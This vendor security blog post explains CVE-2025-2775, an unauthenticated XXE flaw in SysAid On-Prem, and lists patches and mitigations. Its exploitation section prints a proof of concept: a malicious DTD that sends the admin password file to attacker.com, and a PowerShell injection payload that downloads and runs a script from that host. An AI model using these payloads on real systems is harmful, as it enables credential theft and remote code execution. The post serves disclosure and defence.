Go back to All Blog posts

Exploited! SysAid On-Prem XML External Entity Vulnerability (CVE-2025-2775)

Amit Sheps
Amit Sheps Director of Product Marketing LinkedIn
May 8, 2025

SysAid has patched a critical XML External Entity (XXE) flaw that lets unauthenticated attackers turn a routine /mdm check-in request into full administrator compromise—and, when chained with a newly disclosed command-injection bug, into remote code execution (RCE). The vulnerability, tracked as CVE-2025-2775, affects all SysAid On-Prem deployments up to 23.3.40 and is now fixed in 24.4.60.

What is CVE-2025-2775 SysAid On-Prem XML External Entity Vulnerability?

CVE-2025-2775 is an unauthenticated XXE issue in the /mdm/checkin, /mdm/serverurl, and /lshw endpoints of SysAid On-Prem. The application parses attacker-supplied XML with an unsafe call to PropertyListParser.parse() (and related XMLBeans routines) without disabling external entity resolution. By embedding an external <!DOCTYPE> directive, an attacker can:

  • Force the SysAid server to fetch remote resources (blind SSRF).
  • Read arbitrary files on the host OS.
  • Exfiltrate credentials contained in the installation script InitAccount.cmd, which stores the administrator user name and plaintext password.
  • Chain those credentials with a post-auth OS-command injection bug (CVE-2025-2778) in the API_jsp component to execute commands as SYSTEM.

The flaw is rated CVSS 9.3 (Critical) and maps to CWE-611: Improper Restriction of XML External Entity Reference.

Affected versions

  • Vulnerable: SysAid On-Prem 23.3.40 and earlier
  • Patched: SysAid On-Prem 24.4.60 (released March 3 2025)

Exploiting the Vulnerability

1. Triggering XXE

A minimal proof-of-concept sends a malicious plist to /mdm/checkin:

POST /mdm/checkin HTTP/1.1

Host: victim.example.com

Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE x [

 <!ENTITY % d SYSTEM "http://attacker.com/evil.dtd">

 %d;

]>

<plist>&send;</plist>

evil.dtd might embed:

<!ENTITY % file SYSTEM "file:///C:/Program Files/SysAidServer/logs/InitAccount.cmd">
<!ENTITY % send "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%send;

The server silently requests InitAccount.cmd, leaking the admin password to the attacker.

2. From Admin Password to RCE

With the harvested admin credentials, the attacker logs in and abuses the javaLocation parameter of the updateApiSettings form. Because that value is later concatenated into a shell script without sanitisation, a payload such as:

; powershell -c "Invoke-WebRequest http://attacker.com/shell.ps1 -OutFile C:\windows\temp\s.ps1; C:\windows\temp\s.ps1" ;

Yields command execution as the SysAid Windows service account (SYSTEM by default).

Potential Risks

  • Full ITSM takeover – Attackers gain SysAid admin access, allowing ticket tampering, data theft, and impersonation of service-desk staff.
  • Remote code execution – Chaining with CVE-2025-2778 lets attackers run arbitrary OS commands, install backdoors, deploy ransomware, or pivot into the internal network.
  • Credential harvesting – The plaintext admin password often re-used elsewhere becomes an instant lateral-movement accelerator.
  • Compliance impact – Exposure of ticket data (often containing PII and infrastructure details) can trigger GDPR, HIPAA, or PCI violations.

Mitigation Steps

  1. Upgrade immediately – Install SysAid On-Prem 24.4.60 or later.
  2. Remove internet exposure – Until patched, restrict access to /mdm/, /lshw, and API.jsp via reverse proxy or WAF.
  3. Harden XML parsing – Disable external entity resolution in any custom XML parsers.
  4. Rotate credentials – Delete InitAccount.cmd, reset the SysAid admin password, and review stored secrets.
  5. Monitor for IOCs – Look for outbound DTD requests, suspicious cmd.exe children of Tomcat, or rogue .ps1 files.
  6. Validate continuously – Use the IONIX Exposure Management Platform to confirm the patched version is running and no pre-auth XXE endpoints remain externally reachable.

Am I Impacted by CVE-2025-2775?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.

References

  • NVD entry for CVE-2025-2775
  • SysAid 24.4.60 release notes (security fixes)
  • WatchTowr technical write-up and PoC
  • Arctic Wolf analysis bulletin


WATCH A SHORT IONIX DEMO

See how easy it is to implement a CTEM program with IONIX. Find and fix exploits fast.

THE LATEST FROM IONIX

Amit Sheps
May 8, 2025
Exploited! SysAid On-Prem XML External Entity Vulnerability (CVE-2025-2775)
Learn more
Amit Sheps
April 28, 2025
Asset Discovery: A Starting Point, Not a Security Strategy
Learn more
Amit Sheps
April 27, 2025
Exploited! SAP NetWeaver Visual Composer Unauthenticated File-Upload Vulnerability (CVE-2025-31324) 
Learn more